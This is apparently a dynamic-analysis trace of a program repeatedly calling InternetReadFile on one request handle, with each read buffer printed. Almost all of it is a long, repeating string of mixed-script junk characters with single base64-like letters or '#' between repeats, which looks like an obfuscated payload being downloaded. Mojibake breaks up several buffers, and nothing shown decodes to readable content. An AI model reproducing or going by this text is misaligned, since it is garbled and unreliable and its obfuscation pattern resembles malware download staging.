ᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎â¡
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ³á³šË•ÒŽBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ2мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎKмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ9мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ5мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏtмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#м
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏaмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎPмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏvмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏlмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎLмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎRмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎaмᨲᇕእáŽ
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ‡á‡«á®žâ­â™â˜±âŸŽâ¡³á³šË•ÒŽQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏzмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎOмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎDмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ0мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎIмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ8мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎEмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏcмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏoмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎZмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏuмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏiмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏyмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏkмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐â
request_handle: 0x00cc000c
1 1 0

InternetReadFile

buffer: ™â˜±âŸŽâ¡³á³šË•ÒŽbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏdмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏgмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎHмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏeмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎQмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏsмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎCмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎJмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎFмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎMмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎYмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏpмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏbмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏwмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎBмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏnмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕Ҏ#мᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎGмᨲᇕእᎇᇫᮞ⭐♐☱⟎⡳᳚˕ҎUмᨲᇕእᎇᇫᮞ⭐♐☱⟎